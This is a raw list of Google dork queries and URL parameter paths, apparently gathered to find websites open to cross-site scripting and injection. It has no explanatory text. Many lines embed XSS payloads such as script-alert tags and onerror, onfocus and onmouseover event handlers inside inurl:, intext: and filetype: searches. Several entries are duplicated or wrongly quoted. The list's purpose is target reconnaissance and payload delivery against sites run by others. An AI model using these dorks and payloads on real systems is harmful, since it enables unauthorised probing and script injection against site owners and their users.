/2wayvideochat/index.php?r=
/Property-Cpanel.html?pid= /Property-Cpanel.html?pid=
/elms/subscribe.php?course_id= /elms/subscribe.php?course_id=
/gen_confirm.php?errmsg= /gen_confirm.php?errmsg=
/hexjector.php?site= /hexjector.php?site=
/index.php?option=com_easygb&Itemid=
/index.php?view=help&amp;faq=1&amp;ref=
/index.php?view=help&faq=1&ref=
/info.asp?page=fullstory&amp;key=1&amp;news_type=news&amp;onvan=
/info.asp?page=fullstory&key=1&news_type=news&onvan=
/main.php?sid= /main.php?sid=
/news.php?id= /news.php?id=
/notice.php?msg= /notice.php?msg=
/preaspjobboard//Employee/emp_login.asp?msg1=
/schoolmv2/html/studentmain.php?session=
/search.php?search_keywords= /search.php?search_keywords=
/ser/parohija.php?id= /ser/parohija.php?id=
/showproperty.php?id= /showproperty.php?id=
/site_search.php?sfunction= /site_search.php?sfunction=
/strane/pas.php?id= /strane/pas.php?id=
/vehicle/buy_do_search/?order_direction=
/view.php?PID= /view.php?PID=
/winners.php?year=2008&amp;type= /winners.php?year=2008&amp;type=
/winners.php?year=2008&type= /winners.php?year=2008&type=
index.php?option=com_reservations&amp;task=askope&amp;nidser=2&amp;namser= “com_reservations”
index.php?option=com_reservations&task=askope&nidser=2&namser= “com_reservations”
intext:”Website by Mile High Creative”
inurl:.com/search.asp
inurl:/poll/default.asp?catid=
inurl:/products/classified/headersearch.php?sid=
inurl:/products/orkutclone/scrapbook.php?id=
inurl:/search_results.php?search=
inurl:/search_results.php?search=Search&amp;k=
inurl:/search_results.php?search=Search&k=
inurl:/­search_results.php?se­arch=
inurl:com_feedpostold/feedpost.php?url=
inurl:headersearch.php?sid=
inurl:scrapbook.php?id=
inurl:search.php?q=
inurl:”.php?author=”
inurl:”.php?cat=”
inurl:”.php?cmd=”
inurl:”.php?feedback=”
inurl:”.php?file=”
inurl:”.php?from=”
inurl:”.php?keyword=”
inurl:”.php?mail=”
inurl:”.php?max=”
inurl:”.php?pass=”
inurl:”.php?q=”
inurl:”.php?query=”
inurl:”.php?search=”
inurl:”.php?searchstring=”
inurl:”.php?searchst­ring=”
inurl:”.php?tag=”
inurl:”.php?txt=”
inurl:”.php?vote=”
inurl:”.php?years=”
inurl:”.php?z=”
inurl:”contentPage.php?id=”
inurl:”displayResource.php?id=”
pages/match_report.php?mid= pages/match_report.php?mid=
inurl:/search?query=<script>alert('XSS')</script>
inurl:/login?username=<script>alert('XSS')</script>
inurl:/signin?email=<script>alert('XSS')</script>
inurl:/register?fullname=<script>alert('XSS')</script>
inurl:/contact?message=<script>alert('XSS')</script>
inurl:/comment?text=<script>alert('XSS')</script>
inurl:/feedback?subject=<script>alert('XSS')</script>
inurl:/guestbook?message=<script>alert('XSS')</script>
inurl:/feedback?comment=<script>alert('XSS')</script>
inurl:/post?body=<script>alert('XSS')</script>
inurl:/search?q=<script>alert('XSS')</script>
inurl:/profile?username=<script>alert('XSS')</script>
inurl:/user?name=<script>alert('XSS')</script>
inurl:/about?content=<script>alert('XSS')</script>
inurl:/portfolio?project=<script>alert('XSS')</script>
inurl:/testimonial?feedback=<script>alert('XSS')</script>
filetype:js "<script>alert('XSS')</script>"
filetype:js "document.write('<script>alert('XSS')</script>')"
filetype:js "window.location.href='javascript:alert('XSS')'"
filetype:js "eval('<script>alert('XSS')</script>')"
filetype:html "<script>alert('XSS')</script>"
filetype:html "onload=alert('XSS')"
filetype:html "onclick=alert('XSS')"
filetype:html "onmouseover=alert('XSS')"
inurl:/page?name=<script>alert('XSS')</script>
inurl:/search?query=<script>alert('XSS')</script>
inurl:/profile?id=<script>alert('XSS')</script>
inurl:/article?title=<script>alert('XSS')</script>
inurl:/post?id=<script>alert('XSS')</script>
inurl:/search?query=<script>alert('XSS')</script>
inurl:/view?item=<script>alert('XSS')</script>
inurl:/category?name=<script>alert('XSS')</script>
intext:"<form action" "<input type='text' onfocus='alert('XSS')'>"
intext:"<form action" "<textarea onfocus='alert('XSS')'></textarea>"
intext:"<form action" "<input type='password' onfocus='alert('XSS')'>"
intext:"<form action" "<input type='email' onfocus='alert('XSS')'>"
intext:"<form action" "<input type='url' onfocus='alert('XSS')'>"
intext:"<form action" "<input type='tel' onfocus='alert('XSS')'>"
intext:"<form action" "<input type='number' onfocus='alert('XSS')'>"
intext:"<button onclick='alert('XSS')'>Click Me</button>"
intext:"<a href='#' onclick='alert('XSS')'>Click Here</a>"
intext:"<div onmouseover='alert('XSS')'>Hover Me</div>"
intext:"<img src='x' onerror='alert('XSS')'>"
intext:"<input type='text' onblur='alert('XSS')'>"
intext:"<select onchange='alert('XSS')'><option>Select</option></select>"